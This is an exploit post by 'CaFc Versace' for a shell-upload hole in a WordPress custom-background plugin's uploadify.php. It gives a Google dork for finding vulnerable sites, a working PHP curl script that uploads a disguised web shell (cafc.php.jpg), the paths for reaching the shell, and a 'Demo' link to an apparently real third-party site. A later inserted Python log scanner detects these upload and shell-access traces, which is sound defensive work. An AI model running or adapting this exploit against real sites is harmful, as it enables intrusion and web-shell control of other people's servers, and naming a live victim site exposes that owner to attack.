The Vithy, Appius, Dagda, Vector, and Shotzz WordPress themes suffer from a shell upload vulnerability in uploadify.php.
######################################################################################
# Exploit Title : WordPress Custom Background Shell Upload
# Google Dork : inurl:"/wp-content/plugins/custom-background/"
# Date : 23-03-2014
# Exploit Author : CaFc Versace
# Tested on : Windows 7
# Contact : dwi[@]cooyy.net, cafc[@]surabayablackhat.org
#######################################################################################
Proof:
-------------------------------------------------------------------------------------
<?php
// Local file to send; a double extension (.php.jpg) is the name the advisory relies on
$uploadfile="cafc.php.jpg";
// Target the plugin's bundled uploadify.php handler (adjust host as needed)
$ch = curl_init("http://127.0.0.1/wp-content/plugins/custom-background/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
// Multipart POST: 'Filedata' carries the file, 'folder' is the destination the handler writes to
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/plugins/custom-background/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
// The handler's response normally contains the stored path of the uploaded file
print "$postResult";
?>
-------------------------------------------------------------------------------------
Exploit:
-------------------------------------------------------------------------------------
Shell Access : http://localhost/wp-content/plugins/custom-background/uploadify/cafc.php.jpg
or find your shell at : http://localhost/wp-content/uploads/[year]/[month]/
---------------------------------------------------------------------------------------
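As an added detection example (not part of the original post), the following Python scans constructed Apache-style access-log lines for the two artifacts this advisory produces on a server: a POST to the plugin's uploadify.php handler and a later successful request for a double-extension file such as name.php.jpg. The log lines, IPs and timestamps are constructed; the paths follow the advisory.

```python
import re
from typing import Dict, List, Optional

# Constructed Apache combined-format log lines (sample data, not from the original post)
SAMPLE_LOG = """\
203.0.113.5 - - [23/Mar/2014:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [23/Mar/2014:10:01:05 +0000] "POST /wp-content/plugins/custom-background/uploadify/uploadify.php HTTP/1.1" 200 63 "-" "PHP/5.4"
203.0.113.5 - - [23/Mar/2014:10:01:09 +0000] "GET /wp-content/plugins/custom-background/uploadify/cafc.php.jpg HTTP/1.1" 200 1402 "-" "Mozilla/5.0"
198.51.100.7 - - [23/Mar/2014:10:02:00 +0000] "GET /wp-content/uploads/2014/03/photo.jpg HTTP/1.1" 200 88001 "-" "Mozilla/5.0"
"""

# Parses the fields of a combined-format line that matter for this check
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

# A PHP-executable extension followed by a second extension, e.g. name.php.jpg
DOUBLE_EXT_RE = re.compile(r"\.(php\d?|phtml|phar)\.[A-Za-z0-9]+$", re.IGNORECASE)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the parsed fields of one log line, or None if it is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_alerts(log_text: str) -> List[Dict[str, str]]:
    """Flag POSTs to the uploadify handler and successful hits on double-extension files."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        path = rec["path"].split("?", 1)[0]  # ignore any query string
        if rec["method"] == "POST" and path.endswith("/uploadify/uploadify.php"):
            alerts.append({**rec, "reason": "POST to unauthenticated uploadify.php upload handler"})
        elif rec["status"] == "200" and DOUBLE_EXT_RE.search(path):
            alerts.append({**rec, "reason": "served a double-extension file (PHP disguised as image)"})
    return alerts


if __name__ == "__main__":
    for a in find_alerts(SAMPLE_LOG):
        print(f'{a["ts"]} {a["ip"]} {a["method"]} {a["path"]} -> {a["reason"]}')
```

On a real server, also confirm whether the web server actually executes .php.jpg as PHP (e.g. a mod_php AddHandler match on any ".php" segment), since that decides whether the second alert is a stored backdoor or an inert file.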
Demo : http://lakeofthewoodsmn.com/wp-content/plugins/custom-background/uploadify/uploadify.php
---------------------------------------------------------------------------------------
Credits: Agency CaFc
Thanks : SurabayaBlackhat
./learn to be better